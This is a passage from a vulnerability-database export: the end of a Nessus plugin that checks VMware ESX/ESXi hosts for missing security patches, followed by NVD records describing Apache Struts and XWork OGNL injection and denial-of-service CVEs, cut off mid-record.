RPMS\n\n The ESX service console popt, rpm, rpm-libs, and rpm-python RPMS\n are updated to the following versions to resolve multiple\n security issues :\n - popt-1.10.2.3-28.el5_8\n - rpm-4.4.2.3-28.el5_8\n - rpm-libs-4.4.2.3-28.el5_8\n - rpm-python-4.4.2.3-28.el5_8\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-0060, CVE-2012-0061, and\n CVE-2012-0815 to these issues.\n\nk. Vulnerability in third-party Apache Struts component\n\n The version of Apache Struts in vCenter Operations has been\n updated to 2.3.4 which addresses an arbitrary file overwrite\n vulnerability. This vulnerability allows an attacker to create\n a denial of service by overwriting arbitrary files without\n authentication. The attacker would need to be on the same network\n as the system where vCOps is installed.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n assigned the name CVE-2012-0393 to this issue.\n\n Note: Apache struts 2.3.4 addresses the following issues as well :\n CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0394. It\n was found that these do not affect vCOps.\n\n VMware would like to thank Alexander Minozhenko from ERPScan for\n reporting this issue to us.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2012/000197.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Field Bytecode Verifier Cache Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2012-08-30\");\nflag = 0;\n\n\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201209401-SG\",\n patch_updates : make_list(\"ESX400-201302401-SG\", \"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201209402-SG\",\n patch_updates : make_list(\"ESX400-201305404-SG\", \"ESX400-201310402-SG\")\n )\n) flag++;\nif (esx_check(ver:\"ESX 4.0\", patch:\"ESX400-201209404-SG\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208101-SG\",\n patch_updates : make_list(\"ESX410-201211401-SG\", \"ESX410-201301401-SG\", \"ESX410-201304401-SG\", \"ESX410-201307401-SG\", \"ESX410-201312401-SG\", \"ESX410-201404401-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208102-SG\",\n patch_updates : make_list(\"ESX410-201301405-SG\", \"ESX410-201304402-SG\", \"ESX410-201307405-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208103-SG\",\n patch_updates : make_list(\"ESX410-201307403-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208104-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208105-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208106-SG\",\n patch_updates : make_list(\"ESX410-201307404-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208107-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.1\",\n patch : \"ESXi410-201208101-SG\",\n patch_updates : make_list(\"ESXi410-201211401-SG\", \"ESXi410-201301401-SG\", \"ESXi410-201304401-SG\", \"ESXi410-201307401-SG\", \"ESXi410-201312401-SG\", \"ESXi410-201404401-SG\", \"ESXi410-Update03\")\n )\n) flag++;\n\nif (esx_check(ver:\"ESXi 5.0\", vib:\"VMware:esx-base:5.0.0-1.25.912577\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:27:29", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.", "cvss3": {}, "published": "2013-07-16T18:55:00", "type": "cve", "title": "CVE-2013-2134", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2018-11-23T15:54:00", "cpe": [], "id": "CVE-2013-2134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T12:02:00", "description": "The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the \"#\" protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability than CVE-2008-6504.", "cvss3": {}, "published": "2010-08-17T20:00:00", "type": "cve", "title": "CVE-2010-1870", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6504", "CVE-2010-1870"], "modified": "2020-10-20T22:15:00", "cpe": ["cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.10"], "id": "CVE-2010-1870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1870", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:27:09", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-07-10T19:55:00", "type": "cve", "title": "CVE-2013-2115", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2020-09-24T13:28:00", "cpe": ["cpe:/a:apache:struts:2.3.14.1"], "id": "CVE-2013-2115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2115", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:16:45", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-06-07T18:59:00", "type": "cve", "title": "CVE-2016-3093", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2016-11-28T20:06:00", "cpe": ["cpe:/a:ognl_project:ognl:3.0.11", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.3.20.3", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.3.24.1", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.2.3.1"], "id": "CVE-2016-3093", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:ognl_project:ognl:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:03:08", "description": "ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \\u0023 representation for the # character.", "cvss3": {}, "published": "2009-03-23T14:19:00", "type": "cve", "title": "CVE-2008-6504", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6504"], "modified": "2017-08-17T01:29:00", "cpe": ["cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.8", "cpe:/a:opensymphony:xwork:2.0.4", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:opensymphony:xwork:2.0.2", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.0.4", "cpe:/a:opensymphony:xwork:2.1.1", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.0.3", "cpe:/a:opensymphony:xwork:2.1.0", "cpe:/a:apache:struts:2.0.5", "cpe:/a:opensymphony:xwork:2.0.3", "cpe:/a:apache:struts:2.0.7", "cpe:/a:opensymphony:xwork:2.0.5", "cpe:/a:opensymphony:xwork:2.0.1", "cpe:/a:opensymphony:xwork:2.0.0"], "id": "CVE-2008-6504", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6504", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:27:31", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both \"${}\" and \"%{}\" sequences, which causes the OGNL code to be evaluated twice.", "cvss3": {}, "published": "2013-07-16T18:55:00", "type": "cve", "title": "CVE-2013-2135", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2135"], "modified": "2018-11-23T15:49:00", "cpe": [], "id": "CVE-2013-2135", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2135", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T12:29:45", "description": "Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.", "cvss3": {}, "published": "2013-07-20T03:37:00", "type": "cve", "title": "CVE-2013-2251", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2020-10-20T22:15:00", "cpe": ["cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.3.1.1", 